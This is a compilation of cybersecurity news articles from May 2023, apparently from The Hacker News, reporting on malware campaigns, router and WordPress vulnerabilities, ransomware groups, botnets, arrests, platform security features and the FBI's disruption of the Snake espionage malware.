"The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis shared with The Hacker News.
The report builds on recent findings from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads.
The attacks begin with phishing attacks to distribute decoy Microsoft Word documents that, instead of using macros, weaponize the Follina vulnerability (CVE-2022-30190, CVSS score: 7.8) to drop an obfuscated PowerShell script.
From there, the threat actors abuse the PowerShell script to bypass Antimalware Scan Interface (AMSI), disable Microsoft Defender, establish persistence, and ultimately launch the .NET binary containing XWorm.
Interestingly, one of the variables in the PowerShell script is named "$CHOTAbheem," which is likely a reference to Chhota Bheem, an Indian animated comedy adventure television series.
"Based on a quick check, it appears that the individual or group responsible for the attack could have a Middle Eastern/Indian background, although the final attribution has not yet been confirmed," the researchers told The Hacker News, pointing out that such keywords could also be used as a cover.
XWorm is a commodity malware that's advertised for sale on underground forums and comes with a wide range of features that allows it to siphon sensitive information from infected hosts.
The malware is also a Swiss Army knife in that it can perform clipper, DDoS, and ransomware operations, spread via USB, and drop additional malware.
The exact origins of the threat actor are currently unclear, although Securonix said the attack methodology shares artifacts similar to that of TA558, which has been observed striking the hospitality industry in the past.
"Though phishing emails rarely use Microsoft Office documents since Microsoft made the decision to disable macros by default, today we're seeing proof that it is still important to be vigilant about malicious document files, especially in this case where there was no VBscript execution from macros," the researchers said.
Netgear Routers' Flaws Expose Users to Malware, Remote Attacks, and Surveillance
13.5.23 Vulnerebility The Hacker News
As many as five security flaws have been disclosed in Netgear RAX30 routers that could be chained to bypass authentication and achieve remote code execution.
"Successful exploits could allow attackers to monitor users' internet activity, hijack internet connections, and redirect traffic to malicious websites or inject malware into network traffic," Claroty security researcher Uri Katz said in a report.
Additionally, a network-adjacent threat actor could also weaponize the flaws to access and control networked smart devices like security cameras, thermostats, smart locks; tamper with router settings, and even use a compromised network to launch attacks against other devices or networks.
The list of flaws, which were demonstrated at the Pwn2Own hacking competition held at Toronto in December 2022, is as follows -
CVE-2023-27357 (CVSS score: 6.5) - Missing Authentication Information Disclosure Vulnerability
CVE-2023-27368 (CVSS score: 8.8) - Stack-based Buffer Overflow Authentication Bypass Vulnerability
CVE-2023-27369 (CVSS score: 8.8) - Stack-based Buffer Overflow Authentication Bypass Vulnerability
CVE-2023-27370 (CVSS score: 5.7) - Device Configuration Cleartext Storage Information Disclosure Vulnerability
CVE-2023-27367 (CVSS score: 8.0) - Command Injection Remote Code Execution Vulnerability
A proof-of-concept (PoC) exploit chain illustrated by the industrial cybersecurity firm shows that it's possible to string the flaws -- CVE-2023-27357, CVE-2023-27369, CVE-2023-27368, CVE-2023-27370, and CVE-2023-27367 (in that order) -- to extract the device serial number and ultimately obtain root access to it.
"These five CVEs can be chained together to compromise affected RAX30 routers, the most severe of which enable pre-authentication remote code execution on the device," Katz noted.
Users of Netgear RAX30 routers are advised to update to firmware version 1.0.10.94 released by the networking company on April 7, 2023, to address the flaws and mitigate potential risks.
New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows
13.5.23 Virus The Hacker News
A previously undocumented and mostly undetected variant of a Linux backdoor called BPFDoor has been spotted in the wild, cybersecurity firm Deep Instinct said in a technical report published this week.
"BPFDoor retains its reputation as an extremely stealthy and difficult-to-detect malware with this latest iteration," security researchers Shaul Vilkomir-Preisman and Eliran Nissan said.
BPFDoor (aka JustForFun), first documented by PwC and Elastic Security Labs in May 2022, is a passive Linux backdoor associated with a Chinese threat actor called Red Menshen (aka DecisiveArchitect or Red Dev 18), which is known to single out telecom providers across the Middle East and Asia since at least 2021.
The malware is specifically geared towards establishing persistent remote access to compromised target environments for extended periods of time, with evidence pointing to the hacking crew operating the backdoor undetected for years.
BPFDoor gets its name from the use of Berkeley Packet Filters (BPF) a technology that makes it possible to analyze and filter network traffic in Linux systems for network communications and process incoming commands.
In doing so, threat actors can penetrate a victim's system and execute arbitrary code without being detected by firewalls, while simultaneously filtering out unnecessary data.
Deep Instinct's findings come from a BPFDoor artifact that was uploaded to VirusTotal on February 8, 2023. As of writing, only three security vendors have flagged the ELF binary as malicious.
One of the key characteristics that make the new version of BPFDoor even more evasive is its removal of many hard-coded indicators and instead incorporating a static library for encryption (libtomcrypt) and a reverse shell for command-and-control (C2) communication.
Upon launch, BPFDoor is configured to ignore various operating system signals to prevent it from being terminated. It then allocates a memory buffer and creates a special packet sniffing socket that monitors for incoming traffic with a specific Magic Byte sequence by hooking a BPF filter onto the raw socket.
"When BPFdoor finds a packet containing its Magic Bytes in the filtered traffic, it will treat it as a message from its operator and will parse out two fields and will again fork itself," the researchers explained.
"The parent process will continue and monitor the filtered traffic coming through the socket while the child will treat the previously parsed fields as a command-and-control IP-Port combination and will attempt to contact it."
In the final stage, BPFDoor sets up an encrypted reverse shell session with the C2 server and awaits further instructions to be executed on the compromised machine.
The fact that BPFDoor has remained hidden for a long duration speaks to its sophistication, what with threat actors increasingly developing malware targeting Linux systems owing to their prevalence in enterprise and cloud environments.
The development comes as Google announced a new extended Berkeley Packet Filter (eBPF) fuzzing framework called Buzzer to help harden the Linux kernel and ensure that sandboxed programs that run in a privileged context are valid and safe.
The tech giant further said the testing method led to the discovery of a security flaw (CVE-2023-2163) that could be exploited to achieve arbitrary reading and writing of kernel memory.
Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability
13.5.23 Ransomware The Hacker News
U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country.
The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a joint cybersecurity advisory issued Thursday.
"The Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet," the agencies said.
"Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files."
Additionally, the Bl00dy actors are said to have used TOR and other proxies from within victim networks for external communications in an attempt to mask malicious traffic and avoid detection.
conduct remote code execution on the following affected installations. ->
conduct remote code execution on the following affected installations: 8.0.0 to 19.2.7, 20.0.0 to 20.1.6, 21.0.0 to 21.2.10, and 22.0.0 to 22.0.8.
CVE-2023-27350 is a now-patched critical security flaw affecting some versions of PaperCut MF and NG that enables a remote actor to bypass authentication and conduct remote code execution on the following affected installations.
Malicious exploitation of the vulnerability has been observed since mid-April 2023, with attacks primarily weaponizing it to deploy legitimate remote management and maintenance (RMM) software and use the tool to drop additional payloads such as Cobalt Strike Beacons, DiceLoader, and TrueBot on compromised systems.
The disclosure comes as cybersecurity firm eSentire unearthed new activity targeting an unnamed education sector customer that involved the exploitation of CVE-2023-27350 to drop an XMRig cryptocurrency miner.
Attacks against PaperCut print management servers have also been deployed by Iranian state-sponsored threat groups Mango Sandstorm (aka MuddyWater or Mercury) and Mint Sandstorm (aka Phosphorus), Microsoft revealed last week.
Severe Security Flaw Exposes Over a Million WordPress Sites to Hijack
12.5.23 Vulnerebility The Hacker News
A security vulnerability has been disclosed in the popular WordPress plugin Essential Addons for Elementor that could be potentially exploited to achieve elevated privileges on affected sites.
The issue, tracked as CVE-2023-32243, has been addressed by the plugin maintainers in version 5.7.2 that was shipped on May 11, 2023. Essential Addons for Elementor has over one million active installations.
"This plugin suffers from an unauthenticated privilege escalation vulnerability and allows any unauthenticated user to escalate their privilege to that of any user on the WordPress site," Patchstack researcher Rafie Muhammad said.
Successful exploitation of the flaw could permit a threat actor to reset the password of any arbitrary user as long as the malicious party is aware of their username. The shortcoming is believed to have existed since version 5.4.0.
This can have serious ramifications as the flaw could be weaponized to reset the password associated with an administrator account and seize full control of the website.
"This vulnerability occurs because this password reset function does not validate a password reset key and instead directly changes the password of the given user," Muhammad pointed out.
The disclosure comes more than a year after Patchstack revealed another severe flaw in the same plugin that could have been abused to execute arbitrary code on compromised websites.
The findings also follow the discovery of a new wave of attacks targeting WordPress sites since late March 2023 that aims to inject the infamous SocGholish (aka FakeUpdates) malware.
SocGholish is a persistent JavaScript malware framework that functions as an initial access provider to facilitate the delivery of additional malware to infected hosts. The malware has been distributed via drive-by downloads masquerading as a web browser update.
The latest campaign detected by Sucuri has been found to leverage compression techniques using a software library called zlib to conceal the malware, reduce its footprint, and avoid detection.
"Bad actors are continually evolving their tactics, techniques, and procedures to evade detection and prolong the life of their malware campaigns," Sucuri researcher Denis Sinegubko said.
"SocGholish malware is a prime example of this, as attackers have altered their approach in the past to inject malicious scripts into compromised WordPress websites."
It's not just SocGholish. Malwarebytes, in a technical report this week, detailed a malvertising campaign that serves visitors to adult websites with popunder ads that simulate a fake Windows update to drop the "in2al5d p3in4er" (aka Invalid Printer) loader.
"The scheme is very well designed as it relies on the web browser to display a full screen animation that very much resembles what you'd expect from Microsoft," Jιrτme Segura, director of threat intelligence at Malwarebytes, said.
The loader, which was documented by Morphisec last month, is designed to check the system's graphic card to determine if it's running on a virtual machine or in a sandbox environment, and ultimately launch the Aurora information stealer malware.
The campaign, per Malwarebytes, has claimed 585 victims over the past two months, with the threat actor also linked to other tech support scams and an Amadey bot command-and-control panel.
New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe
12.5.23 APT The Hacker News
A previously undetected advanced persistent threat (APT) actor dubbed Red Stinger has been linked to attacks targeting Eastern Europe since 2020.
"Military, transportation, and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums," Malwarebytes disclosed in a report published today.
"Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings."
Red Stinger overlaps with a threat cluster Kaspersky revealed under the name Bad Magic last month as having targeted government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea last year.
While there were indications that the APT group may have been active since at least September 2021, the latest findings from Malwarebytes push the group's origins back by nearly a year, with the first operation taking place in December 2020.
The attack chain, over the years, have leveraged malicious installer files to drop the DBoxShell (aka PowerMagic) implant on compromised systems. The MSI file, for its part, is downloaded by means of a Windows shortcut file contained within a ZIP archive.
Subsequent waves detected in April and September 2021 have been observed to leverage similar attack sequences, albeit with minor variations in the MSI file names.
A fourth set of attacks coincided with the onset of Russia's military invasion of Ukraine in February 2022. The last known activity associated with Red Stinger took place in September 2022, as documented by Kaspersky.
"DBoxShell is malware that utilizes cloud storage services as a command-and-control (C&C) mechanism," security researchers Roberto Santos and Hossein Jazi said.
"This stage serves as an entry point for the attackers, enabling them to assess whether the targets are interesting or not, meaning that in this phase they will use different tools."
The fifth operation is also notable for delivering an alternative to DBoxShell called GraphShell, which is so named for its use of the Microsoft Graph API for C&C purposes.
The initial infection phase is followed by the threat actor deploying additional artifacts like ngrok, rsockstun (a reverse tunneling utility), and a binary to exfiltrate victim data to an actor-controlled Dropbox account.
The exact scale of the infections are unclear, although evidence points to two victims located in central Ukraine a military target and an officer working in critical infrastructure who were compromised as part of the February 2022 attacks.
In both instances, the threat actors exfiltrated screenshots, microphone recordings, and office documents after a period of reconnaissance. One of the victims also had their keystrokes logged and uploaded.
The September 2022 intrusion set, on the other hand, is significant for the fact that it chiefly singled out Russia-aligned regions, including officers and individuals involved in elections. One of the surveillance targets had data from their USB drives exfiltrated.
Malwarebytes said it also identified a library in the Ukrainian city of Vinnytsia that was infected as part of the same campaign, making it the only Ukraine-related entity to be targeted. The motivations are presently unknown.
While the origins of the threat group are a mystery, it has emerged that the threat actors managed to infect their own Windows 10 machines at some point in December 2022, either accidentally or for testing purposes (given the name TstUser), offering an insight into their modus operandi.
Two things stand out: The choice of English as the default language and the use of Fahrenheit temperature scale to display the weather, likely suggesting the involvement of native English speakers.
"In this case, attributing the attack to a specific country is not an easy task," the researchers said. "Any of the involved countries or aligned groups could be responsible, as some victims were aligned with Russia, and others were aligned with Ukraine."
"What is clear is that the principal motive of the attack was surveillance and data gathering. The attackers used different layers of protection, had an extensive toolset for their victims, and the attack was clearly targeted at specific entities."
Spanish Police Takes Down Massive Cybercrime Ring, 40 Arrested
12.5.23 Crime The Hacker News
The National Police of Spain said it arrested 40 individuals for their alleged involvement in an organized crime gang called Trinitarians.
Among those apprehended include two hackers who carried out bank scams through phishing and smishing techniques and 15 other members of the crime syndicate, who have all been charged with a number of offenses such as bank fraud, forging documents, identity theft, and money laundering.
In all, the nefarious scheme is believed to have defrauded more than 300,000 victims, resulting in losses of over 700,000.
"The criminal organization used hacking tools and business logistics to carry out computer scams," officials said.
To pull off the attacks, the cybercriminals sent bogus links via SMS that, when clicked, redirected users to a phishing panel masquerading as legitimate financial institutions to steal their credentials and abuse the access to request for loans and link the cards to cryptocurrency wallets under their control.
These SMS messages sought to induce a false sense of urgency and increase the actors' chance of success by urging the recipients to click on the accompanying link in order to resolve a purported security issue with their bank accounts.
The stolen cards were used to purchase digital assets, which were then cashed out to fund the group's operations, such as paying legal fees, sending money to members in prison, and the purchase of narcotics and weapons.
Some of the illicit proceeds were also sent to foreign bank accounts, from where other group members used the money to purchase real estate in the Dominican Republic.
"They also had an extensive network of mules that they used to receive money from bank transfers and withdraw it through ATMs," the National Police said.
Another scam perpetrated by the outfit entailed contracting point-of-sale (PoS) terminals by setting up front companies to make false purchases.
Authorities said 13 house searches were carried out in the provinces of Madrid, Seville, and Guadalajara, leading to the confiscation of computer equipment, padlocks, 5,000 in cash, lock-picking toolkits, and other documents containing information about the gang's organizational structure.
Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems
12.5.23 Ransomware The Hacker News
Multiple threat actors have capitalized on the leak of Babuk (aka Babak or Babyk) ransomware code in September 2021 to build as many as nine different ransomware families capable of targeting VMware ESXi systems.
"These variants emerged through H2 2022 and H1 2023, which shows an increasing trend of Babuk source code adoption," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.
"Leaked source code enables actors to target Linux systems when they may otherwise lack expertise to build a working program."
A number of cybercrime groups, both big and small, have set their sights on ESXi hypervisors. What's more, at least three different ransomware strains Cylance, Rorschach (aka BabLock), and RTM Locker that have emerged since the start of the year are based on the leaked Babuk source code.
SentinelOne's latest analysis shows that this phenomenon is more common, with the cybersecurity company identifying source code overlaps between Babuk and ESXi lockers attributed to Conti and REvil (aka REvix).
Other ransomware families that have ported various features from Babuk into their respective code include LOCK4, DATAF, Mario, Play, and Babuk 2023 (aka XVGV) ransomware.
Despite this noticeable trend, SentinelOne said it observed no parallels between Babuk and ALPHV, Black Basta, Hive, and LockBit's ESXi lockers, adding it found "little similarity" between ESXiArgs and Babuk, indicating an erroneous attribution.
"Based on the popularity of Babuk's ESXi locker code, actors may also turn to the group' Go-based NAS locker," Delamotte said. "Golang remains a niche choice for many actors, but it continues to increase in popularity."
The development comes as threat actors associated with Royal ransomware, who are suspected to be former Conti members, have expanded their attack toolkit with an ELF variant that's capable of striking Linux and ESXi environments.
"The ELF variant is quite similar to the Windows variant, and the sample does not contain any obfuscation," Palo Alto Networks Unit 42 said in a write-up published this week. "All strings, including the RSA public key and ransom note, are stored as plaintext."
Royal ransomware attacks are facilitated by means of various initial access vectors such as callback phishing, BATLOADER infections, or compromised credentials, which are then abused to drop a Cobalt Strike Beacon as a precursor to ransomware execution.
Since bursting on the scene in September 2022, Royal ransomware has claimed responsibility for targeting 157 organizations on their leak site, with most of the attacks targeting manufacturing, retail, legal services, education, construction, and healthcare services in the U.S., Canada, and Germany.
Andoryu Botnet Exploits Critical Ruckus Wireless Flaw for Widespread Attack
12.5.23 BotNet The Hacker News
A nascent botnet called Andoryu has been found to exploit a now-patched critical security flaw in the Ruckus Wireless Admin panel to break into vulnerable devices.
The flaw, tracked as CVE-2023-25717 (CVSS score: 9.8), stems from improper handling of HTTP requests, leading to unauthenticated remote code execution and a complete compromise of wireless Access Point (AP) equipment.
Andoryu was first documented by Chinese cybersecurity firm QiAnXin earlier this February, detailing its ability to communicate with command-and-control (C2) servers using the SOCKS5 protocol.
While the malware is known to weaponize remote code execution flaws in GitLab (CVE-2021-22205) and Lilin DVR for propagation, the addition of CVE-2023-25717 shows that Andoryu is actively expanding its exploit arsenal to ensnare more devices into the botnet.
"It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies," Fortinet FortiGuard Labs researcher Cara Lin said, adding the latest campaign commenced in late April 2023.
Further analysis of the attack chain has revealed that once the Ruckus flaw is used to gain access to a device, a script from a remote server is dropped onto the infected device for proliferation.
The malware, for its part, also establishes contact with a C2 server and awaits further instructions to launch a DDoS attack against targets of interest using protocols like ICMP, TCP, and UDP.
The cost associated with mounting such attacks is advertised via a listing on the seller's Telegram channel, with monthly plans ranging from $90 to $115 depending on the duration.
RapperBot Botnet Adds Crypto Mining to its List of Capabilities #
The alert follows the discovery of new versions of the RapperBot DDoS botnet that incorporate cryptojacking functionality to profit off compromised Intel x64 systems by dropping a Monero crypto miner.
RapperBot campaigns have primarily focused on brute-forcing IoT devices with weak or default SSH or Telnet credentials to expand the botnet's footprint for launching DDoS attacks.
Fortinet said it detected the latest iteration of the RapperBot miner activity in January 2023, with the attacks delivering a Bash shell script that, in turn, is capable of downloading and executing separate XMRig crypto miners and RapperBot binaries.
Subsequent updates to the malware have merged the two disparate functions into a single bot client with mining capabilities, while also taking steps to terminate competing miner processes.
Interestingly, none of the new RapperBot samples with the integrated XMRig miner incorporate self-propagation capabilities, raising the possibility of an alternate distribution mechanism.
"This suggests the possible availability of an external loader operated by the threat actor that abuses the credentials collected by other RapperBot samples with brute forcing capabilities and infects only x64 machines with the combined bot/miner," Fortinet theorized.
RapperBot's expansion to cryptojacking is yet another indication that financially motivated threat operators leave no stone unturned to "extract the maximum value from machines infected by their botnets."
The twin developments also come as the U.S. Justice Department announced the seizure of 13 internet domains associated with DDoS-for-hire services.
Twitter Finally Rolling Out Encrypted Direct Messages Starting with Verified Users
12.5.23 Social The Hacker News
Twitter is officially beginning to roll out support for encrypted direct messages (DMs) on the platform, more than five months after its chief executive Elon Musk confirmed plans for the feature in November 2022.
The "Phase 1" of the initiative will appear as separate conversations alongside existing direct messages on users' inboxes. Encrypted chats carry a lock icon badge to visually differentiate them.
That said, the opt-in feature is currently limited to verified users or affiliates to a verified organization. It's also essential both the sender and recipient are on the latest versions of the Twitter apps across Android, iOS, and desktop web.
Another criteria to send and receive encrypted messages is that the recipient must follow the sender, has sent a message to the sender in the past, or has accepted a direct message request from the sender at some point.
While Twitter did not disclose the exact method it uses to secure the conversations, the company said it employs a "combination of strong cryptographic schemes" to encrypt users' messages, links, and reactions.
It further emphasized that the encrypted chat contents remain encrypted while stored on its infrastructure and only decrypted at the receiver's end. The implementation is expected to be open sourced later this year.
That said, the work-in-progress nature of the project also means that it does not support encrypted group conversations or allow exchanging media and other file attachments. Some other notable restrictions are as follows -
Users can only register a maximum of up to 10 devices to send and receive encrypted messages.
New devices (where the Twitter app is re-installed) cannot partake in existing encrypted conversations
Logging out from Twitter will calls all messages including encrypted DMs to be deleted from the current device
It also said the current architecture does not "offer protections against man-in-the-middle attacks" and that it does not guarantee forward secrecy, a crucial security measure that ensures that a compromise of a single session key will not impact data shared in other sessions.
"If the private key of a registered device was compromised, an attacker would be able to decrypt all of the encrypted messages that were sent and received by that device," Twitter said, adding it doesn't plan to remediate the limitation keeping larger user experience in mind.
GitHub Extends Push Protection to Prevent Accidental Leaks of Keys and Other Secrets
12.5.23 Security The Hacker News
GitHub has announced the general availability of a new security feature called push protection, which aims to prevent developers from inadvertently leaking keys and other secrets in their code.
The Microsoft-owned cloud-based repository hosting platform, which began testing the feature a year ago, said it's also extending push protection to all public repositories at no extra cost.
The functionality is designed to work hand-in-hand with the existing secret scanning feature, which scans repositories for known secret formats to prevent their fraudulent use and avert potentially serious consequences.
"Push protection prevents secret leaks without compromising the developer experience by scanning for highly identifiable secrets before they are committed," GitHub said earlier this week.
"When a secret is detected in code, developers are prompted directly in their IDE or command line interface with remediation guidance to ensure that the secret is never exposed."
While push protection can be bypassed by providing a reason (e.g., testing, false positive, or acceptable risk), repository and organization administrators and security managers will be notified of such events via email.
To enable the option, users can head to Settings > Select "Code security and analysis" > Enable "Secret scanning" and "Push protection."
Push protection, since it went live in April 2022 as a beta, is estimated to have prevented 17,000 accidental secret leaks, saving more than 95,000 hours that would have otherwise been spent revoking, rotating, and remediating the compromised secrets, the company added.
The development comes nearly five months after GitHub made Secret scanning free for all public repositories, enabling users to be notified about leaked secrets in their repositories.
Google Announces New Privacy, Safety, and Security Features Across Its Services
12.5.23 Security The Hacker News
Google unveiled a slew of new privacy, safety, and security features today at its annual developer conference, Google I/O. The tech giant's latest initiatives are aimed at protecting its users from cyber threats, including phishing attacks and malicious websites, while providing more control and transparency over their personal data.
Here is a short list of the newly introduced features -
Improved data control and transparency
Gmail Dark Web Scan Report
Effortlessly Delete Maps Search History
AI-Powered Safe Browsing
Content Safety API Expansion
About this Image
Spam View in Google Drive
Among the newly introduced features, the first on the list is improved data control and transparency. Google has unveiled an update for its Android operating system that allows users to better control location sharing through apps installed on their devices.
"Starting with location data, you will be informed in permission requests when an app shares your information with third-parties for advertising purposes," Jen Fitzpatrick, senior vice president of core systems and experiences, said.
"You can use this information to decide if you want to approve or decline location sharing for each app so you're always in control."
Android 14, besides providing granular control over the media that apps can access, brings with it a new API that allows developers to limit accessibility services from interacting with their applications and ensure that only Google Play Protect-validated applications have access to users' data.
"This adds more protection from side-loaded apps that may get installed and are trying to access sensitive data," Google's Ronnie Falcon said.
In addition, the company said it's expanding dark web reports to all users with a Gmail account in the U.S. to alert if their sensitive data is circulating on sites not indexed by search engines.
The feature, which was initially made available to Google One subscribers in March 2023, makes it possible to scan the dark web for personally identifiable information such as names, addresses, emails, phone numbers, and Social Security numbers, and seek appropriate guidance.
A third privacy-focused option launched by the tech giant is the ability to delete recent searches from Maps with a single tap as opposed to removing the Maps search history from Web & App Activity.
Other notable features include a new Safe Browsing API and a Spam view in Google Drive that's analogous to Gmail and automatically segregates potentially harmful files or abusive content, which can then be reviewed by users.
The upgrade to Safe Browsing entails a real-time API that alerts of fast-emerging low-reputation and malicious sites, thereby thwarting potential phishing attempts from threat actors who set up short-lived pages to sidestep blocklist-based checks.
The search behemoth further said it's expanding its Content Safety API to flag child sexual abuse material (CSAM) in video content, alongside debuting an "About This Image" tool that offers users with more context to ensure reliable access to trustworthy information.
"'About this Image' provides you with important context like when an image or similar images were first indexed by Google, where it may have first appeared, and where else it's been seen online like a news, social or fact checking site," Fitzpatrick said.
The updates come a week after Google enabled passwordless sign-ins using passkeys across Google Accounts on all platforms.
Last month, the tech giant also enacted a new data deletion policy that requires app developers to offer a "readily discoverable option" to users from both within an app and outside of it.
(The story has been updated after publication to highlight additional privacy and security features introduced by Google in Android 14.)
Experts Detail New Zero-Click Windows Vulnerability for NTLM Credential Theft
12.5.23 Vulnerebility The Hacker News
Cybersecurity researchers have shared details about a now-patched security flaw in Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines.
The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023.
Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out Microsoft, Exchange servers with the March update omit the vulnerable feature.
"An unauthenticated attacker on the internet could use the vulnerability to coerce an Outlook client to connect to an attacker-controlled server," Barnea said in a report shared with The Hacker News.
"This results in NTLM credentials theft. It is a zero-click vulnerability, meaning it can be triggered with no user interaction."
It's also worth noting that CVE-2023-29324 is a bypass for a fix Microsoft put in place in March 2023 to resolve CVE-2023-23397, a critical privilege escalation flaw in Outlook that the company said has been exploited by Russian threat actors in attacks aimed at European entities since April 2022.
Akamai said the issue stems from complex handling of paths in Windows, thereby allowing a threat actor to craft a malicious URL that can sidestep internet security zone checks.
"This vulnerability is yet another example of patch scrutinizing leading to new vulnerabilities and bypasses," Barnea said. "It is a zero-click media parsing attack surface that could potentially contain critical memory corruption vulnerabilities."
In order to stay fully protected, Microsoft is further recommending users to install Internet Explorer Cumulative updates to address vulnerabilities in the MSHTML platform and scripting engine.
Sophisticated DownEx Malware Campaign Targeting Central Asian Governments
12.5.23 Virus The Hacker News
Government organizations in Central Asia are the target of a sophisticated espionage campaign that leverages a previously undocumented strain of malware dubbed DownEx.
Bitdefender, in a report shared with The Hacker News, said the activity remains active, with evidence likely pointing to the involvement of Russia-based threat actors.
The Romanian cybersecurity firm said it first detected the malware in a highly targeted attack aimed at foreign government institutions in Kazakhstan in late 2022. Subsequently, another attack was observed in Afghanistan.
The use of a diplomat-themed lure document and the campaign's focus on data exfiltration suggests the involvement of a state-sponsored group, although the exact identity of the hacking outfit remains indeterminate at this stage.
The initial intrusion vector for the campaign is suspected to be a spear-phishing email bearing a booby-trapped payload, which is a loader executable that masquerades as a Microsoft Word file.
Opening the attachment leads to the extraction of two files, including a decoy document that's displayed to the victim while a malicious HTML application (.HTA) with embedded VBScript code runs in the background.
The HTA file, for its part, is designed to establish contact with a remote command-and-control (C2) server to retrieve a next-stage payload. While the exact nature of the malware is not unknown, it's said to be a backdoor to establish persistence.
The attacks are also notable for employing a variety of custom tools for carrying out post-exploitation activities. This includes -
Two C/C++-based binaries (wnet.exe and utility.exe) to enumerate all the resources on a network,
A Python script (help.py) to establish an infinite communication loop with the C2 server and receive instructions to steal files with certain extensions, delete files created by other malware, and capture screenshots, and
A C++-based malware (diagsvc.exe aka DownEx) that's chiefly designed to exfiltrate files to the C2 server
Two other variants of DownEx have also been earthed, the first of which executes an intermediate VBScript to harvest and transmit the files in the form of a ZIP archive.
The other version, which is downloaded via a VBE script (slmgr.vbe) from a remote server, eschews C++ for VBScript, but retains the same functionality as the former.
"This is a fileless attack the DownEx script is executed in memory and never touches the disk," Bitdefender said. "This attack highlights the sophistication of a modern cyberattack. Cybercriminals are finding new methods for making their attacks more reliable."
Mastermind Behind Twitter 2020 Hack Pleads Guilty and Faces up to 70 Years in Prison
12.5.23 Social The Hacker News
A U.K. national has pleaded guilty in the U.S. in connection with the July 2020 Twitter attack affecting numerous high-profile accounts and defrauding other users of the platform.
Joseph James O'Connor, who also went by the online alias PlugwalkJoe, admitted to "his role in cyberstalking and multiple schemes that involve computer hacking, including the July 2020 hack of Twitter," the U.S. Department of Justice (DoJ) said.
The 23-year-old individual was extradited from Spain on April 26 after the Spanish National Court, in February, approved the DoJ request to hand over O'Connor to face 14 criminal charges in the U.S.
The massive hack, which took place on July 15, 2020, involved O'Connor and his co-conspirators seizing control of 130 Twitter accounts, including those belonging to Barack Obama, Bill Gates, and Elon Musk, to perpetrate a cryptocurrency scam that netted them $120,000 in a few hours.
The attack was made possible by using social engineering techniques to obtain unauthorized access to backend tools used by Twitter, and subsequently leveraging that entry point to seize control of the accounts and, in some instances, sell the access to others. O'Connor himself is said to have purchased unauthorized access to one Twitter account for $10,000.
O'Connor is one of four individuals who have been charged with carrying out the Twitter hack. Nima Fazeli and Graham Ivan Clark were arrested that same month, while O'Connor was apprehended by Spanish authorities in the town of Estepona a year later in July 2021.
Mason Sheppard, according to BBC's Joe Tidy, has not been arrested, although the case against him is active. Clark was awarded a three-year jail term after he pleaded guilty to 30 felony charges in March 2021.
In addition to the Twitter incident, the defendant has been charged with computer intrusions related to takeovers of TikTok and Snapchat user accounts, as well as stalking a juvenile victim online.
This entailed orchestrating SIM swapping attacks against two unnamed victims to gain illicit access to their Snapchat and TikTok accounts, respectively, as well as making false emergency calls to law enforcement about a third victim, claiming that the party was "making threats to shoot people."
SIM swapping occurs when fraudsters contact a telecom service provider under the guise of a victim to port the target's mobile number to a SIM card under their control, resulting in the victim's calls and messages being routed to a malicious unauthorized device controlled by the threat actors.
The miscreants then typically use control of the victim's mobile phone number to take over bank accounts and other services held by the victim that are registered to the mobile phone number by taking advantage of call- or SMS-based two-factor authentication.
O'Connor and his co-conspirators have also been accused of employing SIM swapping techniques to siphon cryptocurrency to the tune of $794,000 from a New York City-based crypto company between March and May 2019.
"After stealing and fraudulently diverting the stolen cryptocurrency, O'Connor and his co-conspirators laundered it through dozens of transfers and transactions and exchanged some of it for Bitcoin using cryptocurrency exchange services," the DoJ said.
"Ultimately, a portion of the stolen cryptocurrency was deposited into a cryptocurrency exchange account controlled by O'Connor."
O'Connor, who has agreed to forfeit about $794,000 in stolen funds, is scheduled to be sentenced on June 23. The charges carry a total maximum penalty of over 70 years in prison.
U.S. Government Neutralizes Russia's Most Sophisticated Snake Cyber Espionage Tool
12.5.23 BigBrothers The Hacker News
The U.S. government on Tuesday announced the court-authorized disruption of a global network compromised by an advanced malware strain known as Snake wielded by Russia's Federal Security Service (FSB).
Snake, dubbed the "most sophisticated cyber espionage tool," is the handiwork of a Russian state-sponsored group called Turla (aka Iron Hunter, Secret Blizzard, SUMMIT, Uroburos, Venomous Bear, and Waterbug), which the U.S. government attributes to a unit within Center 16 of the FSB.
The threat actor has a track record of heavily focusing on entities in Europe, the Commonwealth of Independent States (CIS), and countries affiliated with NATO, with recent activity expanding its footprint to incorporate Middle Eastern nations deemed a threat to countries supported by Russia in the region.
"For nearly 20 years, this unit [...] has used versions of the Snake malware to steal sensitive documents from hundreds of computer systems in at least 50 countries, which have belonged to North Atlantic Treaty Organization (NATO) member governments, journalists, and other targets of interest to the Russian Federation," the Justice Department said.
"After stealing these documents, Turla exfiltrated them through a covert network of unwitting Snake-compromised computers in the United States and around the world."
The neutralization was orchestrated as part of an effort dubbed Operation MEDUSA by means of a tool created by the U.S. Federal Bureau of Investigation (FBI) codenamed PERSEUS that permitted the authorities to issue commands to the malware that caused it to "overwrite its own vital components" on infected machines.
